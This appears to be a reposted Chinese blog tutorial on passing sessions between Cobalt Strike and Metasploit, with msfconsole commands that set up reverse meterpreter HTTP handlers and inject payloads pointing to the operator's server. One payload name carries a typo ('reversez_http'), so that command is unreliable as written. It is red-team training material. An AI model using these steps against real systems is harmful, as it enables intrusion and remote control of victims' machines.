系统相关
首页 > 系统相关> > Cobalt Strike获得shell之后 如何与msf联动

Cobalt Strike获得shell之后 如何与msf联动

作者:互联网

本机做cs,vps做msf

1.Cobalt Strike派生会话给Metasploit

(1)对msf进行设置
使用xshell连接vps,进入msfconsole
对msf的设置如下:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reversez_http
set lhost 172.(这边的ip是服务器的内网地址)
set lport 7777

在这里插入图片描述(run)
(2)对cs进行设置
先设置一个新的监听,这边的IP地址为服务器的外网地址,payload为foreign HTTP,因为此cs不支持直接使用TCP,所以走HTTP的协议(上面的msf也是设置为http)
在这里插入图片描述
右击选择spawn(获得会话)功能,选择刚刚建立的监听器
在这里插入图片描述在这里插入图片描述可以看到msf界面如下,msf获得会话
在这里插入图片描述可以尝试执行命令:
在这里插入图片描述

2.Metasploit派生会话转交给Cobalt Strike

(1)在cs新建一个监听
在这里插入图片描述

(2)msf设置cs正在监听的地址和端口

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true(禁用handler监听,因为我们已经建立监听了所以不用新建)
set lhost 47.
set lport 8088

在这里插入图片描述

在这里插入图片描述在这里插入图片描述
此时在cs可以看到msf传递的派生出来的新的会话了!

在这里插入图片描述

标签:shell,payload,会话,Cobalt,cs,set,Strike,msf,监听
来源: https://blog.csdn.net/qiuqiunile_/article/details/120684472